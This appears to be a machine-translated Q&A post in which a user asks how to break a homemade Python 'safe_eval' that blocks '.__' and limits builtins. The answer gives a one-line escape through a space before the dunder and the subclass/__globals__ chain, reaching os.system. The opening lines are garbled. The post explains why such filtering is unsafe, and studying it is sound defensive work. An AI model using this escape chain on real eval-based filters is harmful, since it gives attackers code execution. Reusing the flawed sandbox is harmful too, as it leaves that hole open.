我知道在不受信任的输入上使用
eval().____foo.bar__bazdef safe_eval(code: str) -> Any | None:
if '.__' in code:
raise ValueError
allowed_builtins = [
'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'bytearray', 'bytes', 'callable', 'chr',
'complex', 'dict', 'divmod', 'enumerate', 'filter', 'float', 'format', 'frozenset',
'hasattr', 'hash', 'hex', 'int', 'isinstance', 'issubclass', 'iter', 'len', 'list',
'map', 'max', 'min', 'next', 'object', 'oct', 'ord', 'pow', 'range', 'repr', 'reversed',
'round', 'set', 'slice', 'sorted', 'str', 'sum', 'tuple', 'zip'
]
return eval(
code,
globals={
'__builtins__': {
builtin : getattr(__builtins__, builtin) for builtin in allowed_builtins
}
},
locals={},
)
回复:“你为什么要这样做?”我希望能够根据用户输入过滤 python 对象。这些对象是应用程序中“会话”的“有效负载”,因此允许用户根据有效负载内容上的任意表达式来过滤会话 - 例如
len(payload.things) > 12所以我的问题是:什么输入字符串将允许攻击者访问评估“外部”的数据,即脚本中的变量或访问操作系统?
只需输入一个空格:
. __标准旁路工作正常。
[x for x in (). __class__. __base__. __subclasses__()
if x. __name__ == 'Quitter'][0]. __init__. __globals__['__builtins__']['__import__'](
'os').system('install ransomware or something')